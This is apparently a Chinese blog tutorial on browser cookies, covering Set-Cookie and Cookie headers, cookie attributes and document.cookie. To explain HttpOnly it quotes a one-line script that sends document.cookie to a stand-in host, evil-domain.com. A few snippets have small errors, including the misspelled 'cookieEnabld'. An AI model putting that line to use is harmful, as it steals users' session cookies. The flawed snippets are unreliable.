JavaScript 进阶营

cookie

2018-04-22  本文已影响24人  woow_wu7

cookie

(一) cookie概述

Cookie 是服务器保存在浏览器的一小段文本信息,每个 Cookie 的大小一般不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。

cookie的主要作用

cookie的主要作用:

查看浏览器是否打开cookie功能

window.navigator.cookieEnabled属性返回一个布尔值,表示浏览器是否打开 Cookie 功能。

window.navigator.cookieEnabld    // 返回一个布尔值,表示浏览器是否打开cookie功能

document.cookie


返回当前网页的cookie

document.cookie








cookie的生成 ------------------- http回应头信息

服务器如果希望在浏览器保存 Cookie,就要在 HTTP 回应的头信息里面,放置一个Set-Cookie字段。


Set-Cookie:foo=bar                        // 在http回应 的头部信息里面设置

上面代码会在浏览器保存一个名为foo的 Cookie,它的值为bar




------------------------------------------

HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco            // http回应的头部中可以有多个Set-Cookie
Set-Cookie: tasty_cookie=strawberry

[page content]




------------------------------------------

除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性

Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date>     // expires属性,失效时间,GMT格式
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<non-zero-digit>   // Max-age有效时长
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>   // 域名
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>   // 路径
Set-Cookie: <cookie-name>=<cookie-value>; Secure   // 安全,只有https协议下可以发送cookie到服务器
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly   // 指定cookie无法通过js脚本拿到





------------------------------------------

一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly






------------------------------------------

如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的key、domain、path和secure都匹配


Set-Cookie: key1=value1; domain=example.com; path=/blog    【【【 原始的Cookie 】】】


改变上面这个 Cookie 的值,就必须使用同样的Set-Cookie


Set-Cookie: key1=value2; domain=example.com; path=/blog    【【【 服务器改变Cookie 】】】


// 【浏览器改变cookie】必须设置 Expires 为过去的时间





-------------------------------------------------------------------------------

只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie: key1=value2; domain=example.com; path=/

上面的命令设置了一个全新的同名 Cookie,但是path属性不一样。

下一次访问example.com/blog的时候,浏览器将向服务器发送两个同名的 Cookie。

----

Cookie: key1=value1; key1=value2

上面代码的两个 Cookie 是同名的,匹配越精确的 Cookie 排在越前面。



cookie的发送 ------------------- http请求头信息

浏览器向服务器发送 HTTP 请求时,每个请求都会带上相应的 Cookie。也就是说,把服务器早前保存在浏览器的这段信息,再发回服务器。这时要使用 HTTP 头信息的Cookie字段。


Cookie: foo=bar

上面代码会向服务器发送名为foo的 Cookie,值为bar。



---------------------------------



Cookie字段可以包含多个 Cookie,使用分号(;)分隔。

Cookie: name=value; name2=value2; name3=value3


---------------------------------


GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry









生成cookie-响应头;发送cookie-请求头

cookie注意事项



(二) cookie的属性

Expires

expires属性指定一个具体的到期时间,到了指定的时间后,浏览器将不再保留这个cookie
expires的值是UTC格式,可以使用 Date.prototype.toUTCString() 进行格式转换

Max-Age

Max-Age属性 指定从现在开始,cookie存在的秒数,过了这个时间后,浏览器将不会保留这个cookie

Expires 和 Max-Age

如果同时指定了 Expires 和 Max-Age ,那么 Max-Age 将优先生效

Domain

Domain 属性指定,浏览器发出HTTP请求时,哪些域名要附带这个Cookie

Path

Path 属性指定,浏览器发出HTTP请求时,哪些路径要附带这个Cookie

Secure

Secure 属性指定,浏览器只有在加密协议 HTTPS 下,才能将这个 Cookie 发送到服务器。

HttpOnly ------------------ 重要


(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。

如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie。

document.cookie

document.cookie属性用于读写当前网页的 Cookie。

添加cookie

document.cookie = 'name=wang'    // key=value的字符串

document.cookie = 'test1=hello';
document.cookie = 'test2=world';
document.cookie
// test1=hello;test2=world



document.cookie读写行为的差异:

(一次可以读出全部 Cookie,但是只能写入一个 Cookie),与 HTTP 协议的 Cookie 通信格式有关。

浏览器向服务器发送 Cookie 的时候,Cookie字段是使用一行将所有 Cookie 全部发送;

服务器向浏览器设置 Cookie 的时候,Set-Cookie字段是一行设置一个 Cookie。


document.cookie = "foo=bar; expires=Fri, 31 Dec 2020 23:59:59 GMT";


上面代码中,写入 Cookie 的时候,同时设置了expires属性。属性值的等号两边,也是不能有空格的。

各个属性的写入注意点如下。

各个属性的写入注意点如下。


document.cookie = 'fontSize=14; '
  + 'expires=' + someDate.toGMTString() + '; '
  + 'path=/subdirectory; '
  + 'domain=*.example.com';

删除一个cookie的值


添加cookie: 
document.cookie = 'name=wu'


删除cookie:
document.cookie = 'name=wu;expires=Thu, 01-Jan-1970 00:00:01 GMT';


上面代码中,名为fontSize的 Cookie 的值为wu,过期时间设为1970年1月1月零点,就等同于删除了这个 Cookie。

上一篇下一篇

猜你喜欢

热点阅读